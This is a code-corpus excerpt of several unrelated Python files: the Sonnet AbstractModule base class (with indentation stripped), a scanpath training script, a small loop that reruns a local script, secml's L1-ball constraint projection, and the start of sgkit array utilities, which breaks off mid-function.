#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Base class for TensorFlow snt.
This file contains the Abstract Base Class for defining Modules in TensorFlow.
A Module is an object that can be connected into the Graph multiple times
using the __call__ method, sharing variables automatically with no need to
explicitly use scopes or specify reuse=True.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import contextlib
import inspect
import types
# Dependency imports
import contextlib2
import six
from sonnet.python.modules import base_info
from sonnet.python.modules import util
import tensorflow as tf
import wrapt
# Import error class from base_errors for backward compatibility.
from sonnet.python.modules.base_errors import Error
from sonnet.python.modules.base_errors import NotConnectedError
from sonnet.python.modules.base_errors import ParentNotBuiltError
from sonnet.python.modules.base_errors import IncompatibleShapeError
from sonnet.python.modules.base_errors import UnderspecifiedError
from sonnet.python.modules.base_errors import NotSupportedError
from sonnet.python.modules.base_errors import NotInitializedError
from sonnet.python.modules.base_errors import DifferentGraphError
from sonnet.python.modules.base_errors import ModuleInfoError
# pylint: enable=g-bad-import-order
# pylint: enable=unused-import
from tensorflow.python.framework import ops
_MODULE_STACK = []
_CONNECTION_OBSERVER_STACK = []
@contextlib.contextmanager
def observe_connections(observer):
"""Notifies the observer whenever any Sonnet module is connected to the graph.
If a module contains nested modules, the observer is notified once for each
nested module, followed by the containing module.
For example:
```python
def logging_observer(connected_subgraph):
logging.info(connected_subgraph.module.module_name)
with snt.observe_connections(logging_observer):
output = imagenet_module(input_tensor)
```
Args:
observer: Callable accepting a single argument. Will be called with a
`ConnectedSubGraph` each time a module is connected to the graph.
Yields:
None: just yields control to the inner context.
"""
_CONNECTION_OBSERVER_STACK.append(observer)
try:
yield
finally:
_CONNECTION_OBSERVER_STACK.pop()
@six.add_metaclass(abc.ABCMeta)
class AbstractModule(object):
"""Superclass for Sonnet Modules.
This class defines the functionality that every module should implement,
principally the `build` method which is wrapped using `tf.make_template`
and called from `__call__`. Every time the module is called it will
be connected into the graph but using the same shared set of variables, thanks
to the template.
For this to work correctly, the `build` implementation in the derived class
must access all variables using `tf.get_variable`, not `tf.Variable`. The same
set of variables must be created each time, if this is not the case an Error
will be raised.
Every subclass must call this class' `__init__` at the start of their
`__init__`, passing the relevant name. If this step is omitted variable
sharing will not work.
"""
def __init__(self, _sentinel=None, custom_getter=None,
name=None): # pylint: disable=invalid-name
"""Performs the initialisation necessary for all AbstractModule instances.
Every subclass of AbstractModule must begin their constructor with a call to
this constructor, i.e.
`super(MySubModule, self).__init__(custom_getter=custom_getter, name=name)`.
If you instantiate sub-modules in __init__ you must create them within the
`_enter_variable_scope` context manager to ensure they are in the module's
variable scope. Alternatively, instantiate sub-modules in `_build`.
Args:
_sentinel: Variable that only carries a non-None value if `__init__` was
called without named parameters. If this is the case, a deprecation
warning is issued in form of a `ValueError`.
custom_getter: Callable or dictionary of callables to use as
custom getters inside the module. If a dictionary, the keys
correspond to regexes to match variable names. See the `tf.get_variable`
documentation for information about the custom_getter API.
name: Name of this module. Used to construct the Templated build function.
If `None` the module's class name is used (converted to snake case).
Raises:
TypeError: If `name` is not a string.
TypeError: If a given `custom_getter` is not callable.
ValueError: If `__init__` was called without named arguments.
"""
if _sentinel is not None:
raise ValueError("Calling AbstractModule.__init__ without named "
"arguments is not supported.")
if name is None:
name = util.to_snake_case(self.__class__.__name__)
elif not isinstance(name, six.string_types):
raise TypeError("Name must be a string, not {} of type {}.".format(
name, type(name)))
self._is_connected = False
self._connected_subgraphs = []
# If the given custom getter is a dictionary with a per-variable custom
# getter, wrap it into a single custom getter.
if isinstance(custom_getter, collections.Mapping):
self._custom_getter = util.custom_getter_router(
custom_getter_map=custom_getter,
name_fn=lambda name: name[len(self.scope_name) + 1:])
elif custom_getter is not None and not callable(custom_getter):
raise TypeError("Given custom_getter is not callable.")
else:
self._custom_getter = custom_getter
self._template = tf.make_template(name,
self._build_wrapper,
create_scope_now_=True,
custom_getter_=self._custom_getter)
self._original_name = name
self._unique_name = self._template.variable_scope.name.split("/")[-1]
# Copy signature of _build to __call__.
adapter_fn = getattr(self._build, "__func__", self._build)
@wrapt.decorator(adapter=adapter_fn)
def copy_signature(method, unused_instance, args, kwargs):
return method(*args, **kwargs)
@copy_signature
def __call__(instance, *args, **kwargs): # pylint: disable=invalid-name
return AbstractModule.__call__(instance, *args, **kwargs)
# use __dict__ instead of setting directly to avoid a Callable pytype error
self.__dict__["__call__"] = types.MethodType(__call__, self)
# Update __call__ and the object docstrings to enable better introspection.
self.__doc__ = self._build.__doc__
self.__call__.__func__.__doc__ = self._build.__doc__
# Keep track of which graph this module has been connected to. Sonnet
# modules cannot be connected to multiple graphs, as transparent variable
# sharing is impossible in that case.
self._graph = None
# Container for all variables created in this module and its sub-modules.
self._all_variables = set([])
# Calling `.defun()` causes the module's call method to become wrapped as
# a graph function.
self._defun_wrapped = False
def _build_wrapper(self, *args, **kwargs):
"""Function which will be wrapped in a Template to do variable sharing.
Passes through all arguments to the _build method, and returns the
corresponding outputs, plus the name_scope generated by this call of the
template.
Args:
*args: args list for self._build
**kwargs: kwargs dict for self._build
Returns:
A tuple containing (output from _build, scope_name).
"""
output = self._build(*args, **kwargs)
# Make a dummy subscope to check the name scope we are in. We could read
# the name scope from one of the outputs produced, except that the outputs
# could have been produced from a subscope instantiated by the build
# function, for example if inner modules are present. Calling name_scope
# here and creating a new subscope guarantees we get the right answer.
# Because we don't create an ops inside this dummy scope, no extra memory
# will be consumed.
with tf.name_scope("dummy") as scope_name:
this_scope_name = scope_name[:-len("/dummy/")]
return output, this_scope_name
def _check_init_called(self):
"""Checks that the base class's __init__ method has been called.
Raises:
NotInitializedError: `AbstractModule.__init__` has not been called.
"""
try:
self._template
except AttributeError:
raise NotInitializedError("You may have forgotten to call super at the "
"start of %s.__init__."
% self.__class__.__name__)
def _set_module_info(self):
"""Creates a `ModuleInfo` and adds it to the graph collections."""
self._module_info = base_info.ModuleInfo(
module_name=self.module_name,
scope_name=self.scope_name,
class_name="{}.{}".format(
self.__class__.__module__, self.__class__.__name__),
connected_subgraphs=self._connected_subgraphs)
self._graph.add_to_collection(base_info.SONNET_COLLECTION_NAME,
self._module_info)
def _check_same_graph(self):
"""Checks that the module is not being connect to multiple Graphs.
An instance of a Sonnet module 'owns' the variables it contains, and permits
seamless variable sharing. As such, connecting a single module instance to
multiple Graphs is not possible - this function will raise an error should
that occur.
Raises:
DifferentGraphError: if the module is connected to a different Graph than
it was previously used in.
"""
with ops.init_scope():
# We need `init_scope` incase we're running inside a defun. In that case
# what we want is information about where the function will be called not
# where the function is being built.
current_graph = tf.get_default_graph()
will_call_in_eager_context = tf.executing_eagerly()
if self._graph is None:
self._graph = current_graph
self._set_module_info()
if not will_call_in_eager_context:
# Same graph checks only make sense when calling from graph mode (in eager
# mode there is a single process level context where all modules are
# created).
if self._graph != current_graph:
raise DifferentGraphError("Cannot connect module to multiple Graphs.")
@abc.abstractmethod
def _build(self, *args, **kwargs):
"""Add elements to the Graph, computing output Tensors from input Tensors.
Subclasses must implement this method, which will be wrapped in a Template.
Args:
*args: Input Tensors.
**kwargs: Additional Python flags controlling connection.
Returns:
output Tensor(s).
"""
@contextlib.contextmanager
def _capture_variables(self):
"""Adds variables used by this module to self._all_variables.
Upon entering this context manager the module adds itself onto the top
of the module call stack. Any variables created with `tf.get_variable()`
inside `_build()` or `_enter_variable_scope()` while this module is on top
of the call stack will be added to `self._all_variables`.
Before exiting the context the module removes itself from the top of the
call stack, and adds all of the variables in `self._all_variables` to its
parent module (the new top) of the call stack.
Yields:
Nothing, the yield just transfers focus back to the inner context.
"""
_MODULE_STACK.append(self)
try:
with contextlib2.ExitStack() as stack:
# Ideally move re-entering store into Template.variable_scope.
template_store = getattr(self._template, "_template_store", None)
if template_store is not None:
# In eager mode, the template store keeps references to created
# variables such that they survive even if there are no references to
# them in Python code. Variables added to an eager template store are
# also added to TensorFlow global collections (unlike regular
# variables created in eager mode).
stack.enter_context(template_store.as_default())
stack.enter_context(
util.notify_about_variables(self._all_variables.add))
yield
finally:
# Remove `self` from `module_stack`, this happens as part of cleanup
# even if an error is raised.
_MODULE_STACK.pop()
if _MODULE_STACK:
# Peek into the stack to add created variables to the parent
parent_module = _MODULE_STACK[-1]
parent_module._all_variables.update(self._all_variables) # pylint: disable=protected-access
def _add_connected_subgraph(self, call_method, outputs, subgraph_name_scope,
*inputs_args, **inputs_kwargs):
"""Adds a newly connected subgraph.
Args:
call_method: the function used to connect this Sonnet module to the graph.
outputs: `call_method` outputs.
subgraph_name_scope: name scope of the newly connected subgraph.
*inputs_args: `self._build` inputs `*args`.
**inputs_kwargs: `self._build` inputs `*kwargs`.
"""
build_inputs = inspect.getcallargs(call_method,
*inputs_args, **inputs_kwargs)
# "self" should normally be in `build_inputs` but some people are decorating
# their `_build` function with `memoize`, in which case the function
# signature doesn't contain `self` anymore.
if "self" in build_inputs:
del build_inputs["self"]
connected_subgraph = base_info.ConnectedSubGraph(
module=self, name_scope=subgraph_name_scope,
inputs=build_inputs,
outputs=outputs)
self._connected_subgraphs.append(connected_subgraph)
for observer in _CONNECTION_OBSERVER_STACK:
observer(connected_subgraph)
@property
def defun_wrapped(self):
"""Returns boolean indicating whether this module is defun wrapped."""
return self._defun_wrapped
def defun(self):
"""Wraps this modules call method in a callable graph function."""
if not self._defun_wrapped:
self._defun_wrapped = True
self._call = tf.contrib.eager.defun(self._call)
def __call__(self, *args, **kwargs):
return self._call(*args, **kwargs)
def _call(self, *args, **kwargs):
"""Entry point when a module is called to connect it to the graph.
This is the entry point when users connect a Module into the Graph. The
underlying _build method will have been wrapped in a Template by the
constructor, and we call this template with the provided inputs here.
Note we use `_call` instead of `__call__` to allow instance level monkey
patching (see `defun`).
Args:
*args: Arguments for underlying _build method.
**kwargs: Keyword arguments for underlying _build method.
Returns:
The result of the underlying _build method.
"""
self._check_init_called()
self._check_same_graph()
with self._capture_variables():
outputs, subgraph_name_scope = self._template(*args, **kwargs)
self._is_connected = True
if not tf.executing_eagerly():
# In eager mode the module is called a lot more frequently than in graph
# mode (for each training step) and so we don't keep track of connected
# subgraphs (since there will be orders of magnitude more of them).
self._add_connected_subgraph(self._build, outputs, subgraph_name_scope,
*args, **kwargs)
return outputs
@property
def name_scopes(self):
"""Returns a tuple of all name_scopes generated by this module."""
if tf.executing_eagerly():
raise NotSupportedError(
"The name_scopes property is not supported in eager mode.")
return tuple(subgraph.name_scope for subgraph in self._connected_subgraphs)
@property
def variable_scope(self):
"""Returns the variable_scope declared by the module.
It is valid for library users to access the internal templated
variable_scope, but only makes sense to do so after connection. Therefore we
raise an error here if the variable_scope is requested before connection.
The only case where it does make sense to access the variable_scope before
connection is to get the post-uniquification name, which we support using
the separate .scope_name property.
Returns:
variable_scope: `tf.VariableScope` instance of the internal `tf.Template`.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
self._ensure_is_connected()
return self._template.variable_scope
@property
def scope_name(self):
"""Returns the full name of the Module's variable scope."""
return self._template.variable_scope.name
@property
def module_name(self):
"""Returns the name of the Module."""
return self._unique_name
@property
def is_connected(self):
"""Returns true iff the Module been connected to the Graph at least once."""
return self._is_connected
@property
def graph(self):
"""Returns the Graph instance which the module is connected to, or None."""
return self._graph
@property
def connected_subgraphs(self):
"""Returns the subgraphs created by this module so far."""
if tf.executing_eagerly():
raise NotSupportedError(
"Connected sub-graphs are not tracked in eager mode.")
return tuple(self._connected_subgraphs)
@property
def last_connected_subgraph(self):
"""Returns the last subgraph created by this module.
Returns:
The last connected subgraph.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
if tf.executing_eagerly():
raise NotSupportedError(
"Connected sub-graphs are not tracked in eager mode.")
self._ensure_is_connected()
return self._connected_subgraphs[-1]
@classmethod
def get_possible_initializer_keys(cls):
"""Returns the keys the dictionary of variable initializers may contain.
This provides the user with a way of knowing the initializer keys that are
available without having to instantiate a sonnet module. Subclasses may
override this class method if they need additional arguments to determine
what initializer keys may be provided.
Returns:
Set with strings corresponding to the strings that may be passed to the
constructor.
"""
return getattr(cls, "POSSIBLE_INITIALIZER_KEYS", set())
def _ensure_is_connected(self):
"""Raise an Error if the module has not been connected yet.
Until the module is connected into the Graph, any variables created do
not exist yet and cannot be created in advance due to not knowing the size
of the input Tensor(s). This assertion ensures that any variables contained
in this module must now exist.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
if not self.is_connected:
raise NotConnectedError(
"Variables in {} not instantiated yet, __call__ the module "
"first.".format(self.scope_name))
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def _enter_variable_scope(self, reuse=None, check_same_graph=True):
"""Returns a contextlib.contextmanager to enter the internal variable scope.
This is useful for situations where submodules must be declared in the
constructor, or somewhere else that is not called under the `_build` method.
If such a case arises, calling `with self._enter_variable_scope():` will
cause the variables in the submodule to be correctly scoped.
An example justification for this is to allow the `Transposable` interface
to be implemented - you might want to construct all the submodules at
construction time so that you can call `.transpose()` and connect the
result of that before connecting the non-transposed module.
```python
class SomeModule(snt.AbstractModule):
def __init__(self, name="some_module"):
super(SomeModule, self).__init__(name=name)
with self._enter_variable_scope():
# We need to construct this submodule before we get to the _build
# method, for some reason.
self._sub_mod = snt.SomeSubmodule(name="some_submodule")
def _build(self, input):
# Connect to the already constructed submodule.
return self._sub_mod(input)
```
If you omit this then the submodule and parent module will appear to
be "side by side" rather than nested when viewed in the Graph viewer, and
functions such as `snt.get_variables_in_module()` or the `get_variables()`
method will not know about variables defined in the submodule.
Args:
reuse: Boolean passed to `tf.variable_scope`.
check_same_graph: Boolean to determine if same graph check should run. If
you are only entering the scope to name other variable scopes (e.g. not
to create/reuse variables) then it is legitimate to set this to False.
Yields:
The variable_scope inside the template.
"""
self._check_init_called()
if check_same_graph:
self._check_same_graph()
with self._capture_variables():
with tf.variable_scope(self._template.variable_scope, reuse=reuse) as vs:
yield vs
# pylint: enable=g-doc-return-or-yield
@property
def variables(self):
"""**All** `tf.Variable`s used when the module is connected.
This property does not rely on global collections and should generally be
preferred vs. `get_variables` and `get_all_variables`.
See the documentation for `AbstractModule._capture_variables()` for more
information about what variables are captured.
Returns:
A sorted (by variable name) tuple of `tf.Variable` objects.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
self._ensure_is_connected()
return util.sort_by_name(self._all_variables)
@property
def trainable_variables(self):
"""All **trainable** `tf.Variable`s used when the module is connected.
This property does not rely on global collections and should generally be
preferred vs. `get_variables` and `get_all_variables`.
See the documentation for `AbstractModule._capture_variables()` for more
information about what variables are captured.
Returns:
A sorted (by variable name) tuple of `tf.Variable` objects.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
return tuple(v for v in self.variables if v.trainable)
@property
def non_trainable_variables(self):
"""All **non-trainable** `tf.Variable`s used when the module is connected.
This property does not rely on global collections and should generally be
preferred vs. `get_variables` and `get_all_variables`.
See the documentation for `AbstractModule._capture_variables()` for more
information about what variables are captured.
Returns:
A sorted (by variable name) tuple of `tf.Variable` objects.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
return tuple(v for v in self.variables if not v.trainable)
def get_variables(self, collection=tf.GraphKeys.TRAINABLE_VARIABLES):
"""Returns tuple of `tf.Variable`s declared inside this module.
Note that this operates by searching this module's variable scope,
and so does not know about any modules that were constructed elsewhere but
used inside this module.
This method explicitly re-enters the Graph which this module has been
connected to.
Args:
collection: Collection to restrict query to. By default this is
`tf.Graphkeys.TRAINABLE_VARIABLES`, which doesn't include non-trainable
variables such as moving averages.
Returns:
A tuple of `tf.Variable` objects.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
self._ensure_is_connected()
# Explicitly re-enter Graph, in case the module is being queried with a
# different default Graph from the one it was connected to. If this was not
# here then querying the variables from a different graph scope would
# produce an empty tuple.
with self._graph.as_default():
return util.get_variables_in_scope(
self.variable_scope, collection=collection)
def get_all_variables(self, collection=tf.GraphKeys.TRAINABLE_VARIABLES):
"""Returns all `tf.Variable`s used when the module is connected.
See the documentation for `AbstractModule._capture_variables()` for more
information.
Args:
collection: Collection to restrict query to. By default this is
`tf.Graphkeys.TRAINABLE_VARIABLES`, which doesn't include non-trainable
variables such as moving averages.
Returns:
A sorted (by variable name) tuple of `tf.Variable` objects.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
self._ensure_is_connected()
collection_variables = set(tf.get_collection(collection))
# Return variables in self._all_variables that are in `collection`
return util.sort_by_name(self._all_variables & collection_variables)
def __getstate__(self):
raise NotSupportedError(
"Sonnet AbstractModule instances cannot be serialized. You should "
"instead serialize all necessary configuration which will allow "
"modules to be rebuilt.")
@six.add_metaclass(abc.ABCMeta)
class Transposable(object):
"""Transposable module interface.
The Transposable interface requires that transposable modules implement
a method called `transpose`, returning a module that is the transposed
version of the one the method is called on.
Calling the method twice should return a module with the same specifications
as the original module.
When implementing a transposable module, special care is required to make
sure that parameters needed to instantiate the module are provided as
functions whose invocation is deferred to graph construction time.
For example, in Linear we might want to call:
```python
linear = snt.Linear(name="linear", output_size=output_size)
linear_transpose = linear.transpose()
```
where the output_size for linear_transpose is not known yet, as linear is
not yet connected to the graph: output_size is passed to linear_transpose's
constructor as a lambda returning linear.input_size. The lambda will return
the correct value once linear is given an input.
Notice that linear_transpose's output_size value does not need to be defined
until the module is connected to the graph.
"""
@abc.abstractmethod
def transpose(self, name=None, **kwargs):
"""Builds and returns transposed version of module.
Args:
name: Name of the transposed module.
**kwargs: Additional Python flags controlling transposition.
Returns:
Transposed version of the module.
"""
@abc.abstractmethod
def input_shape(self):
"""Returns shape of input `Tensor` passed at last call to `build`."""
class Module(AbstractModule):
"""Module wrapping a function provided by the user."""
def __init__(self, build, custom_getter=None, name=None):
"""Constructs a module with a given build function.
The Module class can be used to wrap a function assembling a network into a
module.
For example, the following code implements a simple one-hidden-layer MLP
model by defining a function called make_model and using a Module instance
to wrap it.
```python
def make_model(inputs):
lin1 = snt.Linear(name="lin1", output_size=10)(inputs)
relu1 = tf.nn.relu(lin1, name="relu1")
lin2 = snt.Linear(name="lin2", output_size=20)(relu1)
return lin2
model = snt.Module(name='simple_mlp', build=make_model)
outputs = model(inputs)
```
The `partial` package from `functools` can be used to bake configuration
parameters into the function at construction time, as shown in the following
example.
```python
from functools import partial
def make_model(inputs, output_sizes):
lin1 = snt.Linear(name="lin1", output_size=output_sizes[0])(inputs)
relu1 = tf.nn.relu(lin1, name="relu1")
lin2 = snt.Linear(name="lin2", output_size=output_sizes[1])(relu1)
return lin2
model = snt.Module(name='simple_mlp',
build=partial(make_model, output_size=[10, 20])
outputs = model(inputs)
```
Args:
build: Callable to be invoked when connecting the module to the graph.
The `build` function is invoked when the module is called, and its
role is to specify how to add elements to the Graph, and how to
compute output Tensors from input Tensors.
The `build` function signature can include the following parameters:
*args - Input Tensors.
**kwargs - Additional Python parameters controlling connection.
custom_getter: Callable or dictionary of callables to use as
custom getters inside the module. If a dictionary, the keys
correspond to regexes to match variable names. See the
`tf.get_variable` documentation for information about the
custom_getter API.
name: Module name. If set to `None` (the default), the name will be set to
that of the `build` callable converted to `snake_case`. If `build` has
no name, the name will be 'module'.
Raises:
TypeError: If build is not callable.
TypeError: If a given `custom_getter` is not callable.
"""
if not callable(build):
raise TypeError("Input 'build' must be callable.")
if name is None:
name = util.name_for_callable(build)
super(Module, self).__init__(custom_getter=custom_getter, name=name)
self._build_function = build
def _build(self, *args, **kwargs):
"""Forwards call to the passed-in build function."""
return self._build_function(*args, **kwargs)
|
py | 1a40af03a7129d5edcd377f19b3f8d82faa5be24 | """Train script.
Usage:
train.py <hparams> <dataset_root> [--cuda=<id>]
train.py -h | --help
Options:
-h --help Show this screen.
--cuda=<id> Speed in knots [default: 0].
"""
import torch
import numpy as np
from docopt import docopt
from os.path import join
from irl_dcb.config import JsonConfig
from dataset import process_data
from irl_dcb.builder import build
from irl_dcb.trainer import Trainer
torch.manual_seed(42619)
np.random.seed(42619)
if __name__ == '__main__':
args = docopt(__doc__)
device = torch.device('cuda:{}'.format(args['--cuda']))
hparams = args["<hparams>"]
dataset_root = args["<dataset_root>"]
hparams = JsonConfig(hparams)
# dir of pre-computed beliefs
DCB_dir_HR = join(dataset_root, 'DCBs/HR/')
DCB_dir_LR = join(dataset_root, 'DCBs/LR/')
data_name = '{}x{}'.format(hparams.Data.im_w, hparams.Data.im_h)
# bounding box of the target object (for scanpath ratio evaluation)
bbox_annos = np.load(join(dataset_root,
'coco_search_annos_{}.npy'.format(data_name)),
allow_pickle=True).item()
# load ground-truth human scanpaths
fixation_path = join(dataset_root,
'processed_human_scanpaths_TP_trainval.npy')
human_scanpaths = np.load(fixation_path,
allow_pickle=True,
encoding='latin1')
# exclude incorrect scanpaths
if hparams.Train.exclude_wrong_trials:
human_scanpaths = list(filter(lambda x: x['correct'] == 1,
human_scanpaths))
# process fixation data
dataset = process_data(human_scanpaths, DCB_dir_HR, DCB_dir_LR, bbox_annos,
hparams)
built = build(hparams, True, device, dataset['catIds'])
trainer = Trainer(**built, dataset=dataset, device=device, hparams=hparams)
trainer.train()
|
py | 1a40af86cbe268faa8ca156a8b3eea1ff9b91d83 | #!/usr/bin/python3
import subprocess
import time
import os
while True:
# cloudkey = os.path.isfile('cloud.key.hacklab')
# print(cloudkey)
# if not (cloudkey):
os.system('python3 dragonfly_public_cloud.py') |
py | 1a40af8ea6ce3771a46b47a9d698f81a0ba66bc3 | """
.. module:: CConstraintL1
:synopsis: L1 Constraint
.. moduleauthor:: Battista Biggio <[email protected]>
.. moduleauthor:: Ambra Demontis <[email protected]>
"""
from secml.array import CArray
from secml.optim.constraints import CConstraint
class CConstraintL1(CConstraint):
"""L1 Constraint.
Parameters
----------
center : scalar or CArray, optional
Center of the constraint. Use an array to specify a different
value for each dimension. Default 0.
radius : scalar, optional
The semidiagonal of the constraint. Default 1.
Attributes
----------
class_type : 'l1'
"""
__class_type = 'l1'
def __init__(self, center=0, radius=1):
super(CConstraintL1, self).__init__()
self.center = center
self.radius = radius
@property
def center(self):
"""Center of the constraint."""
return self._center
@center.setter
def center(self, value):
"""Center of the constraint."""
self._center = CArray(value)
@property
def radius(self):
"""Semidiagonal of the constraint."""
return self._radius
@radius.setter
def radius(self, value):
"""Semidiagonal of the constraint."""
self._radius = float(value)
def _constraint(self, x):
"""Returns the value of the constraint for the sample x.
The constraint value y is given by:
y = ||x - center||_1 - radius
Parameters
----------
x : CArray
Input array.
Returns
-------
float
Value of the constraint.
"""
return float((x - self.center).norm(order=1) - self.radius)
def _projection(self, x):
"""Project x onto feasible domain / within the given constraint.
Solves the optimisation problem (using the algorithm from [1]):
min_w 0.5 * || w - x ||_2^2 , s.t. || w ||_1 <= s
Parameters
----------
x : CArray
Input sample.
Returns
-------
CArray
Projected x onto feasible domain if constraint is violated.
Notes
-----
Solves the problem by a reduction to the positive simplex case.
"""
s = float(self.radius)
v = (x - self.center).ravel()
# compute the vector of absolute values
u = abs(v)
# check if v is already a solution
if u.sum() <= s:
# l1-norm is <= s
out = v + self._center
return out.tosparse() if x.issparse else out
# v is not already a solution: optimum lies on the boundary (norm == s)
# project *u* on the simplex
w = self._euclidean_proj_simplex(u, s=s)
# compute the solution to the original problem on v
w *= v.sign()
out = w + self._center
return out.tosparse() if x.issparse else out
def _euclidean_proj_simplex(self, v, s=1):
"""Compute the Euclidean projection on a positive simplex.
Solves the optimisation problem (using the algorithm from [1]):
min_w 0.5 * || w - v ||_2^2 ,
s.t. \\sum_i w_i = s, w_i >= 0
Parameters
----------
v : CArray
1-Dimensional vector
s : int, optional
Radius of the simplex. Default 1.
Returns
-------
w : CArray
Euclidean projection of v on the simplex.
Notes
-----
The complexity of this algorithm is in O(n log(n)) as it involves
sorting v. Better alternatives exist for high-dimensional sparse
vectors (cf. [1]). However, this implementation still easily
scales to millions of dimensions.
References
----------
[1] Efficient Projections onto the l1-Ball for
Learning in High Dimensions
John Duchi, Shai Shalev-Shwartz, Yoram Singer,
and Tushar Chandra.
International Conference on Machine Learning (ICML 2008)
http://www.cs.berkeley.edu/~jduchi/projects/DuchiSiShCh08.pdf
"""
v = CArray(v).ravel()
d = v.size
# check if we are already on the simplex
if v.sum() == s and (v >= 0).sum() == d:
return v # best projection: itself!
# get the array of cumulative sums of a sorted (decreasing) copy of v
u = v.deepcopy()
u.sort(inplace=True)
u = u[::-1]
if u.issparse:
u_nnz = CArray(u.nnz_data).todense()
cssv = u_nnz.cumsum()
else:
cssv = u.cumsum()
# get the number of > 0 components of the optimal solution
# (only considering non-null elements in v
j = CArray.arange(1, cssv.size+1)
if u.issparse:
rho = (j * u_nnz > (cssv - s)).sum() - 1
else:
rho = (j * u > (cssv - s)).sum() - 1
# compute the Lagrange multiplier associated to the simplex constraint
theta = (cssv[rho] - s) / (rho + 1.0)
# compute the projection by thresholding v using theta
w = v
if w.issparse:
p = CArray(w.nnz_data)
p -= theta
w[w.nnz_indices] = p
else:
w -= theta
w[w < 0] = 0
return w
def _gradient(self, x):
"""Returns the gradient of c(x) in x.
Parameters
----------
x : CArray
Input sample.
Returns
-------
CArray
The gradient of the constraint computed on x.
"""
return (x - self.center).sign().ravel()
|
py | 1a40affab087804e3786722e9b67d81cd70a4139 | import warnings
from typing import Any, Callable, Hashable, List, Mapping, Optional, Set, Tuple, Union
import numpy as np
from numba import guvectorize
from xarray import Dataset
from . import variables
from .typing import ArrayLike, DType
def check_array_like(
a: Any,
dtype: Union[None, DType, Set[DType]] = None,
kind: Union[None, str, Set[str]] = None,
ndim: Union[None, int, Set[int]] = None,
) -> None:
"""Raise an error if an array does not match given attributes (dtype, kind, dimensions).
Parameters
----------
a
Array of any type.
dtype
The dtype the array must have, by default None (don't check)
If a set, then the array must have one of the dtypes in the set.
kind
The dtype kind the array must be, by default None (don't check).
If a set, then the array must be one of the kinds in the set.
ndim
Number of dimensions the array must have, by default None (don't check)
If a set, then the array must have one of the number of dimensions in the set.
Raises
------
TypeError
* If `a` does not have the attibutes `dtype`, `shape`, and `ndim`.
* If `a` does not have a dtype that matches `dtype`.
* If `a` is not a dtype kind that matches `kind`.
ValueError
If the number of dimensions of `a` does not match `ndim`.
"""
array_attrs = "ndim", "dtype", "shape"
for k in array_attrs:
if not hasattr(a, k):
raise TypeError(f"Not an array. Missing attribute '{k}'")
if dtype is not None:
if isinstance(dtype, set):
dtype = {np.dtype(t) for t in dtype}
if a.dtype not in dtype:
raise TypeError(
f"Array dtype ({a.dtype}) does not match one of {dtype}"
)
elif a.dtype != np.dtype(dtype):
raise TypeError(f"Array dtype ({a.dtype}) does not match {np.dtype(dtype)}")
if kind is not None:
if isinstance(kind, set):
if a.dtype.kind not in kind:
raise TypeError(
f"Array dtype kind ({a.dtype.kind}) does not match one of {kind}"
)
elif a.dtype.kind != kind:
raise TypeError(f"Array dtype kind ({a.dtype.kind}) does not match {kind}")
if ndim is not None:
if isinstance(ndim, set):
if a.ndim not in ndim:
raise ValueError(
f"Number of dimensions ({a.ndim}) does not match one of {ndim}"
)
elif ndim != a.ndim:
raise ValueError(f"Number of dimensions ({a.ndim}) does not match {ndim}")
def encode_array(x: ArrayLike) -> Tuple[ArrayLike, List[Any]]:
"""Encode array values as integers indexing unique values.
The codes created for each unique element in the array correspond
to order of appearance, not the natural sort order for the array
dtype.
Examples
--------
>>> encode_array(['c', 'a', 'a', 'b']) # doctest: +SKIP
(array([0, 1, 1, 2], dtype=int64), array(['c', 'a', 'b'], dtype='<U1'))
Parameters
----------
x
[array-like, shape: (M,)]
Array of elements to encode of any type.
Returns
-------
indexes : (M,) ndarray
Encoded values as integer indices.
values : ndarray
Unique values in original array in order of appearance.
"""
# argsort not implemented in dask: https://github.com/dask/dask/issues/4368
names, index, inverse = np.unique(x, return_index=True, return_inverse=True) # type: ignore[no-untyped-call]
index = np.argsort(index)
rank = np.empty_like(index)
rank[index] = np.arange(len(index))
return rank[inverse], names[index]
class MergeWarning(UserWarning):
"""Warnings about merging datasets."""
pass
def merge_datasets(input: Dataset, output: Dataset) -> Dataset:
"""Merge the input and output datasets into a new dataset, giving precedence to variables
and attributes in the output.
Parameters
----------
input
The input dataset.
output
Dataset
The output dataset.
Returns
-------
Dataset
The merged dataset. If `input` and `output` have variables (or attributes) with the same name,
a `MergeWarning` is issued, and the corresponding variables (or attributes) from the `output`
dataset are used.
"""
input_vars = {str(v) for v in input.data_vars.keys()}
output_vars = {str(v) for v in output.data_vars.keys()}
clobber_vars = sorted(list(input_vars & output_vars))
if len(clobber_vars) > 0:
warnings.warn(
f"The following variables in the input dataset will be replaced in the output: {', '.join(clobber_vars)}",
MergeWarning,
)
ds = output.merge(input, compat="override")
# input attrs are ignored during merge, so combine them with output, and assign to the new dataset
input_attr_keys = {str(v) for v in input.attrs.keys()}
output_attr_keys = {str(v) for v in output.attrs.keys()}
clobber_attr_keys = sorted(list(input_attr_keys & output_attr_keys))
if len(clobber_attr_keys) > 0:
warnings.warn(
f"The following global attributes in the input dataset will be replaced in the output: {', '.join(clobber_attr_keys)}",
MergeWarning,
)
combined_attrs = {**input.attrs, **output.attrs}
return ds.assign_attrs(combined_attrs) # type: ignore[no-any-return, no-untyped-call]
def conditional_merge_datasets(input: Dataset, output: Dataset, merge: bool) -> Dataset:
"""Merge the input and output datasets only if `merge` is true, otherwise just return the output."""
return merge_datasets(input, output) if merge else output
def define_variable_if_absent(
ds: Dataset,
default_variable_name: Hashable,
variable_name: Optional[Hashable],
func: Callable[[Dataset], Dataset],
) -> Dataset:
